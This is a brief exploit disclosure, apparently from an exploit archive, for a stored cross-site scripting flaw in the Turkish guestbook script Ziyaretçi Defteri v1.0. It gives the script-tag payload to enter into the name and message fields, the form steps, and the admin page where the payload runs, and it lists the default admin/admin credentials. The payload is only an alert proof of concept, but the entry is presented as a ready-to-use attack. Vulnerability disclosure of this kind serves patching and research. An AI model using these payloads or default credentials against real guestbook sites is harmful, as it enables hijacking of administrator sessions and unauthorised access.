Ziyaretçi Defteri v1.0 XSS Vulnerability

#Software: Ziyaretçi Defteri v1.0
#download: http://www.aspindir.com/goster/5059
#demo: http://russian.buyuksari.com/
#Found By: GeFORC3 ( G3 )

#Exploit:

1-http://www.example.com/script_path/main.asp

İsim :        <script>alert("G3");</script>
E-mail : example@example.com
Mesaj :      <script>alert("G3");</script> *

Press to "Gönder"(send) button.

2-http://www.example.com/script_path/admin.asp
   (default user:admin  pass:admin)

This xss works on Ziyaretçi Defteri v1.0 (Guestbook script) script's admin
page


WwW.GeFORC3.Org  |  WwW.HeykirBlog.Com  |  WwW.NetKaBus.Com